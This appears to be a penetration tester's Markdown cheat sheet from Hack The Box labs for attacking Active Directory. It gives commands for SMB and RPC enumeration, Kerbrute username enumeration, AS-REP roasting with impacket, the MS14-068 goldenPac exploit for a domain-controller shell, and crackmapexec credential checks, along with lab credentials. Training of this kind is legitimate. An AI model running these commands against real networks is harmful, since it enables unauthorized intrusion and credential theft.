# Active Directory

## smbclient

The smbclient utility is the Swiss Army knife of Linux-to-NT tools. It lets you send messages to workstations, display browse lists and connect to SMB shares. The commands below pair it with `smbmap`, which enumerates shares together with the permissions a given account has on each of them.

```bash
smbmap -H 10.129.148.199                                 # shares and permissions, null session
smbclient -N -L //10.129.148.199                         # -N no password, -L list shares
smbmap -H 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'      # same, authenticated
```

## rpcclient

`rpcclient` is a tool for executing client-side MS-RPC functions (SAMR, LSARPC, NETLOGON and friends) against a Windows host or domain controller.

Anonymous (null session) login

```bash
rpcclient -U '' -N 10.129.148.19   # -U '' empty username, -N no password
```

Login with credentials

```bash
$ rpcclient -U htb.local/james 10.129.148.199
Enter HTB.LOCAL\james's password: 
rpcclient $> enumdom                       # <TAB> shows the enumdom* commands
enumdomains    enumdomgroups  enumdomusers   
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
rpcclient $>
```

## Kerbrute

A tool to quickly brute-force and enumerate valid Active Directory accounts through Kerberos pre-authentication. `userenum` sends an AS-REQ without pre-auth data for each name: the KDC answers `KDC_ERR_PREAUTH_REQUIRED` for existing users and `KDC_ERR_C_PRINCIPAL_UNKNOWN` for unknown ones, so valid names are confirmed without a failed logon being recorded against the account. Password spraying with `passwordspray` does count against the lockout threshold, so check the domain policy first.

> <https://github.com/ropnop/kerbrute>

```bash
# enumerate valid usernames against the DC at 10.10.10.52
./kerbrute userenum --domain htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.52
```

## Impacket-Tools

> sudo apt install python3-impacket

To connect to `mssql` (add `-windows-auth` when the account is a domain user rather than a SQL login)

```bash
impacket-mssqlclient 'admin:m$$ql_S@_P@ssW0rd!@10.129.148.199'
```

List the users that are AS-REP roastable (accounts with "Do not require Kerberos preauthentication" set) using a set of valid credentials with `GetNPUsers`. Without further options this only lists them; add `-request` to also retrieve the `$krb5asrep$` hashes for offline cracking.

```bash
impacket-GetNPUsers 'htb.local/james:J@m3s_P@ssW0rd!' -dc-ip 10.129.148.199
```

Getting a shell with a forged Kerberos ticket (MS14-068, the PAC validation flaw that `goldenPac` exploits) from a plain domain user. The target is the DC's hostname, which must resolve (for example via `/etc/hosts`). Learned in HTB Mantis.

```bash
impacket-goldenPac 'htb.local/james:J@m3s_P@ssW0rd!@mantis'
```

## Crackmapexec

> <https://github.com/byt3bl33d3r/CrackMapExec>
>
> Documentation: <https://mpgn.gitbook.io/crackmapexec/>

crackmapexec is a post-exploitation tool that helps automate assessing the security of *large* Active Directory networks.

Checking whether credentials are valid over SMB: a `[+]` in the output means the logon succeeded, and `(Pwn3d!)` means the account is a local administrator on that host.

```bash
crackmapexec smb 10.129.148.199 -u 'James' -p 'J@m3s_P@ssW0rd!' 
```
